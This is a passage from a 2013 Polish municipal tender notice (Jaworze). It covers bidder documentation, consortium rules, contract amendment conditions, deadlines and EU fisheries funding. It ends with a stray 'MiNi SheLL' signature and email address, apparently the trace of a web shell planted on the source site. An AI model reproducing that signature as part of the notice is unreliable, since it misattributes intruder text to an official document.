<p>Wypełniony szczegółowo formularz Ofertowy - Załącznik Nr 2 do SIWZ
Kosztorysy ofertowe.
Wycena wyposażenia biurowego wg. Załącznika Nr 11 do SIWZ.
Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do  
   wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru 
   prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie 
   dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu 
   pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
   korzystania z nich przy wykonaniu zamówienia odpowiadające postanowieniom § 1 ust. 6 pkt 2 
   rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów,  
   jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane 
   (Dz.U. z 2013, poz. 231) - Załącznik Nr 9 do SIWZ  lub inne dokumenty potwierdzające wskazane 
   w tym przepisie okoliczności. 
Wykonawca jest zobowiązany wykazać nie później niż na dzień składania ofert brak podstaw do wykluczenia z powodu niespełnienia warunku określonego w art. 24 ust. 2 pkt 5 ustawy Pzp. W tym celu Zamawiający żąda od Wykonawcy złożenia wraz z ofertą listy podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), albo informacji o tym, że nie należy do grupy kapitałowej 6.3.5. Zamawiający żąda od wykonawcy złożenia wraz z ofertą pełnomocnictwa udzielanego osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego - Załącznik Nr 8 do SIWZ.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium   Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w SIWZ  składa dokument wystawiony w kraju, 
w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że :
nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
nie orzeczono wobec niego zakazu ubiegania się o zamówienia.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem 
        przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego (konsorcjum, spółka cywilna) 
        ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo 
        reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.  Do wykonawców 
        o których mowa w art.23 ust.1 stosuje się art. 141. Przed podpisanie mowy zamawiający będzie żądał od 
        wykonawców ubiegających się wspólnie, umowy regulującej współpracę tych podmiotów.
W wypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółka 
         cywilna) dokumenty winny zostać przedłożone odrębnie 
         w odniesieniu do każdego z wykonawców. Wspólnicy ponoszą solidarną odpowiedzialność za 
         niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
Wykonawcy ubiegający się o udzielenie zamówienia w ramach spółki cywilnej dokumenty winny zostać przedłożone odrębnie w odniesieniu do spółki cywilnej 
          oraz odrębnie w odniesieniu do jej wspólników.
W przypadku wykonawców wspólnie ubiegających się o zamówienie (konsorcjum, spółka cywilna), 
          warunki wynikające z art. 22 ust.1 pkt1 uPzp muszą być spełnione oddzielnie przez każdego 
          z wykonawców składających ofertę, natomiast warunki wynikające z art.22 ust.1 pkt 2-4 (warunki 
          materialne lub warunki potwierdzając zdolność wykonawcy do wykonania przedmiotowego zamówienia) 
          mogą być spełnione łącznie przez wszystkich wykonawców ubiegających się o zamówienia oświadczenia, 
          o których mowa wyżej powinny potwierdzać spełnienie warunków wynikających z art. 22 ust. 1 pkt1-4 
          uPzp.
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8, 10 i 11 uPzp - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, 
o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 uPzp, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 uPzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art.144 uPzp Zamawiający przewiduje możliwość zmian postanowień zawartej umowy 
           w stosunku do treści oferty, na odstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia 
           co najmniej jedne z okoliczności wymienionych poniżej :
           Zmiana podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy.
           Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy 
                        - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego;
           Zmiana osób przewidzianych do realizacji zamówienia.  Zmiana taka wymaga każdorazowo 
                        zgody Zamawiającego a nowo zaproponowana osoba musi spełniać wymagania określone 
                        w SIWZ - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego. 
          Zmiana osoby / osób wskazanych w umowie jako nadzorujących roboty - na wniosek 
                        Zamawiającego.
          Zmiany terminu wykonania umowy o czas opóźnienia jeżeli takie opóźnienie wystąpi lub będzie 
                       miało wpływ na wykonanie przedmiotu umowy w przypadku:
zawieszenia robót przez Zamawiającego,
szczególnie niesprzyjających warunków atmosferycznych, 
zmian w dokumentacji dokonanych na wniosek Zamawiającego,
opóźnienia przekazania terenu realizacji robót,
zmiany terminu dokonania odbioru robót przewidzianych w umowie,
odmiennych od przyjętych warunków geologicznych,
odmiennych od przyjętych warunków terenowych w szczególności istnienia niezinwetaryzowanej infrastruktury podziemnej sieci, instalacji lub innych niezinwentaryzowanych obiektów budowlanych,
siły wyższej, 
przedłużającego się postępowania odwoławczego, przekroczenia ustawowych terminów wydania przez organy administracji lub innych instytucji branżowych (dot. np. linii gazowych, telekomunikacyjnych, energetycznych) decyzji, zezwoleń, uzgodnień itp.,
odmowy wydania przez w/w organy wymaganych decyzji, zezwoleń, uzgodnień itp. - na wniosek  
                Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego.
         Zmiany sposobu realizacji przedmiotu zamówienia w postaci:
konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych 
              /technologicznych niż wskazane w specyfikacjach, w przypadku gdyby zastosowanie przewidzianych 
              rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu 
               na zmiany obowiązującego prawa,
odmiennych od przyjętych w specyfikacjach warunków terenowych w szczególności istnienia 
              niezinwetaryzowanej infrastruktury podziemnej sieci, instalacji lub innych niezinwentaryzowanych 
             obiektów budowlanych skutkujących niemożnością zrealizowania przedmiotu zamówienia przy 
             dotychczasowych założeniach technologicznych.
odmiennych od przyjętych w specyfikacjach warunków geologicznych skutkujących niemożnością 
              zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych,
         Zmiany dokonane w granicach przewidzianych w ustawie Prawo budowlane wynikające z:
wprowadzenia uzgodnionych rozwiązań zamiennych w stosunku do przewidzianych 
w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego 
gdy zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a ust. 5 lub dokonane zostały zgodnie z zapisami art. 36a ust. 6 ustawy z zastrzeżeniem art. 57 ust. 2 ustawy Prawo budowlane,
wad dokumentacji projektowej. 
- na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody Zamawiającego.
Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót lub obniżenia wynagrodzenia z powodu zastosowanych rozwiązań zamiennych wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej za tą część w granicach udokumentowanego interesu Zamawiającego - na wniosek Inspektora Nadzoru Inwestorskiego w postaci pisemnej akceptacji Wykonawcy i Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jaworze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jaworze
43-384 Jaworze, ul. Zdrojowa 82, pokój nr 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2013 godzina 10:00, miejsce: Urząd Gminy Jaworze
43-384 Jaworze, ul. Zdrojowa 82, pokój nr 001.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja realizowana w ramach Środka 4.1. Rozwój obszarów zależnych od rybactwa, programu operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com